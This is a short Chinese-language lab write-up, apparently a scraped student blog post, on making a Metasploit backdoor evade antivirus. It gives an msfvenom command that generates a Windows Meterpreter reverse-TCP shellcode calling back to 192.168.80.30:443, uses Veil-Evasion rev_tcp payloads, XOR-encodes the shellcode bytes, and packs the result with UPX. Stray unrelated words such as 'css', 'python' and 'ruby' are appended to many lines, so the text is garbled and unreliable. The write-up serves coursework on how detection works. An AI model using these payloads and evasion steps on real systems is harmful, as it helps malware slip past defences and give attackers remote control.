檢測上節課利用Msfvenom生成的後門軟件,事實證實Metaspliot做爲作熱門的平臺之一,各AV廠商都有所防範。css
多編碼幾回也沒有明顯效果。python
事實上殺毒軟件廠商在對特徵碼進行掃描的同時,也會對編碼器所用的解碼代碼進行檢索,像咱們以前經常使用的比較有名的編碼器早已經被殺軟廠商們加入了黑名單,因此使用該編碼器即便編碼次數再多也不會起到實質性效果。shell
此次使用免殺功能更強一點的一款平臺Veil-Evasionwindows
按照其提示,輸入list查看payload,選擇能實現反彈端口鏈接的payload(通常看名字就能看出來,rev_tcp
,rev_http
結尾的通常都是)此次咱們隨便選擇其中知足咱們要求的payload,鍵入use + name of payload
(截圖的時候我選擇的是ruby/meterpreter/rev_tcp
可是生成的時候一直彈出payload有問題,因此實際上使用的是python/meterpreter/rev_tcp
)數組
將.exe文件拷貝出來到靶機上,結果被查殺安全
在網站上進行檢測ruby
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.30 LPORT=443 -f c
用Microsoft Visual Studio 2013或者Visual C++ 6.0進行編譯運行生成可執行文件。tcp
用VirSCAN.org進行檢測
函數
奇數位異或85,即01010101 偶數位異或170,即10101010
將原數組的內容進行改變,這樣在殺軟檢查時被發現的概率就減少了工具
用下面的命令來加壓縮殼
# upx 4320-1.exe -o 4320m.exe
·
效果並非很好